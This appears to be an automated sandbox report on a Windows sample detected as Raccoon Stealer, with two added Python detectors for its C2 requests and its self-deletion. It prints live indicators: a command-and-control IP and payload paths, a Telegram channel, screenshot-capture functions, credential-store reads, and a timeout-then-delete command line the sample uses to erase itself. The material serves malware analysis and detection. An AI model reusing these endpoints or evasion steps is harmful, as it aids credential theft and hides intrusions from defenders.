Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2
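The request dumps above share a recognisable shape: no User-Agent header, a Cache-Control/Pragma no-cache pair, a Content-Type on a GET, a bare IP address as Host, a t.me channel page fetched by something that is not a browser, and a //l/f/<key>/<id> path for the follow-on download. As an added example (not part of the sandbox report), the Python checker below turns those traits into rules and runs them over raw HTTP request text. The three malicious requests it scans are the report's own request lines with their line breaks restored; the fourth is a constructed browser request for contrast. The rule set and all helper names are this example's own choices.

```python
"""Flag Raccoon-style HTTP requests in raw request text.

Added example for this report, not sandbox output. SAMPLE_REQUESTS are
reconstructed from the request lines the report prints (line breaks
restored) plus one constructed browser request for contrast; the rule set
and helper names are this example's own choices.
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # names lower-cased


def parse_request(raw: str) -> Request:
    """Parse the request line and headers of one HTTP/1.x request (body ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return Request(method.upper(), path, headers)


def host_is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP address (optional :port)."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def suspicious_reasons(req: Request) -> list:
    """Return the traits a request shares with the report's C2 traffic (empty = clean)."""
    reasons = []
    host = req.headers.get("host", "").lower()
    if "user-agent" not in req.headers:
        reasons.append("no User-Agent header")
    if host_is_bare_ip(host):
        reasons.append(f"bare-IP host {host}")
    if req.method == "GET" and "content-type" in req.headers:
        reasons.append("GET carries a Content-Type header")  # browsers send none on GET
    if host == "t.me" and "user-agent" not in req.headers:
        reasons.append("Telegram channel page fetched by a non-browser client")
    if req.path.startswith("//l/f/"):
        reasons.append("follow-on payload path //l/f/<key>/<id>")
    if (req.method == "POST" and host_is_bare_ip(host)
            and req.headers.get("content-type", "").startswith("text/plain")):
        reasons.append("text/plain POST to a bare-IP host (check-in)")
    return reasons


def scan(raw_requests) -> list:
    """Return (request line, reasons) for each request that trips at least one rule."""
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = suspicious_reasons(req)
        if reasons:
            hits.append((f"{req.method} {req.path}", reasons))
    return hits


SAMPLE_REQUESTS = [
    # check-in POST to the C2 address, headers as printed in the report
    "POST / HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nContent-Type: text/plain; charset=UTF-8\r\n"
    "Content-Length: 128\r\nHost: 185.138.164.150\r\n\r\n",
    # Telegram channel page requested with the same non-browser header set
    "GET /agrybirdsgamerept HTTP/1.1\r\nCache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\nPragma: no-cache\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\nHost: t.me\r\n\r\n",
    # follow-on payload fetched from the same address
    "GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "Host: 185.138.164.150\r\n\r\n",
    # constructed browser request, should not be flagged
    "GET /search?q=test HTTP/1.1\r\nHost: duckduckgo.com\r\n"
    "User-Agent: Mozilla/5.0\r\nAccept: text/html\r\n\r\n",
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_REQUESTS):
        print(line, "->", "; ".join(reasons))
```

Each rule alone is weak (plenty of legitimate tooling omits a User-Agent), so the checker reports the full list of reasons per request and leaves the alerting threshold to the caller; in the report's traffic every malicious request trips three rules while the browser request trips none.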

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 1_2_0042C157

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

System Summary:

Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040E139 1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043E2E4 1_2_0043E2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 1_2_0042A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043628C 1_2_0043628C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042C383 1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00410648 1_2_00410648
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004206DD 1_2_004206DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040CF54 1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004210B1 1_2_004210B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040F2E6 1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004373C6 1_2_004373C6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040D684 1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00437819 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041FD36 1_2_0041FD36
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040BF59 1_2_0040BF59
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041E014 1_2_0041E014
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042E110 1_2_0042E110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0044A480 1_2_0044A480
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A4BD 1_2_0045A4BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004484BA 1_2_004484BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A5DD 1_2_0045A5DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0046475B 1_2_0046475B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004187EC 1_2_004187EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041E857 1_2_0041E857
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041EBE9 1_2_0041EBE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00422D2B 1_2_00422D2B
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: String function: 0044F0F9 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: String function: 00467790 appears 100 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: String function: 00440940 appears 35 times
PE file does not import any functions
Source: api-ms-win-core-handle-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.328077326.000000006E63B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327485031.000000006E502000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
PE file contains strange resources
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.1.dr Static PE information: Number of sections : 18 > 10
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Virustotal: Detection: 33%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe ReversingLabs: Detection: 37%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
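The process tree above is the classic delayed self-delete: the sample spawns cmd.exe, which waits ten seconds with timeout so the parent can exit and release its file lock, then deletes the parent's own executable. As an added example (not sandbox output), the Python check below catches this from process-creation events by resolving the cmd.exe child's parent and comparing the del target against the parent's image path, so it does not depend on the sample's file name. The event list is constructed in the style of Sysmon Event ID 1 fields: image paths and command lines are the report's, the PIDs other than 7124 are made up, and the last event is a benign delete added for contrast. Function names are this example's own.

```python
"""Detect the delayed self-deletion pattern in the report's process tree.

Added example, not sandbox output. EVENTS is a constructed process-creation
log with Sysmon Event ID 1 style fields: the image paths and command lines
are the report's, the PIDs other than 7124 are made up, and the last event
is a benign delete added for contrast. Function names are this example's own.
"""
import ntpath
import re

DELETE_COMMANDS = {"del", "erase"}
DELAY_COMMANDS = {"timeout", "ping"}   # common ways to wait for the parent to exit first


def _segments(cmdline: str):
    """Split a cmd.exe command line on & / && (quoted ampersands are not handled)."""
    return [s.strip() for s in re.split(r"&&|&", cmdline) if s.strip()]


def deletion_targets(cmdline: str):
    """Return (paths passed to del/erase, whether a delay command precedes them)."""
    targets, delayed = [], False
    for seg in _segments(cmdline):
        tokens = seg.split()
        # drop a leading "cmd.exe /C" (or /K) wrapper, quoted or not
        while tokens:
            head = tokens[0].strip("'\"").lower()
            if ntpath.basename(head) in ("cmd", "cmd.exe") or head in ("/c", "/k"):
                tokens.pop(0)
            else:
                break
        if not tokens:
            continue
        if ">" in tokens:                      # ignore output redirection (> Nul)
            tokens = tokens[:tokens.index(">")]
        verb = tokens[0].lower()
        if verb in DELAY_COMMANDS:
            delayed = True
        elif verb in DELETE_COMMANDS:
            args = [t for t in tokens[1:] if not t.startswith("/")]   # skip /f /q etc.
            if args:
                targets.append(" ".join(args).strip("'\""))
    return targets, delayed


def find_self_deletion(events):
    """Return one finding per cmd.exe child whose command line deletes its parent's image."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        if ntpath.basename(event["image"]).lower() != "cmd.exe":
            continue
        parent = by_pid.get(event["ppid"])
        if parent is None:
            continue
        targets, delayed = deletion_targets(event["cmdline"])
        for target in targets:
            if ntpath.normcase(target) == ntpath.normcase(parent["image"]):
                findings.append({
                    "cmd_pid": event["pid"],
                    "parent_pid": parent["pid"],
                    "deleted_image": parent["image"],
                    "delayed": delayed,
                })
    return findings


SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe"
EVENTS = [
    {"pid": 7124, "ppid": 4000, "image": SAMPLE, "cmdline": f"'{SAMPLE}'"},
    {"pid": 6012, "ppid": 7124, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q '{SAMPLE}'"},
    {"pid": 6020, "ppid": 6012, "image": r"C:\Windows\SysWOW64\timeout.exe",
     "cmdline": "timeout /T 10 /NOBREAK"},
    # constructed benign cleanup: deletes a temp file, not its parent
    {"pid": 6100, "ppid": 6000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del /q "C:\Users\user\AppData\Local\Temp\setup.log"'},
]

if __name__ == "__main__":
    for finding in find_self_deletion(EVENTS):
        print(finding)
```

Keying the match on the parent's image path rather than on a file name or hash means a renamed or repacked build of the same loader still trips the rule; the delayed flag is reported separately because a plain del of the parent without a wait is a different (and usually failing) behaviour. Quoted ampersands and 2>&1 style redirections are deliberately not parsed here.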
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/67@1/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 1_2_0042A224
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
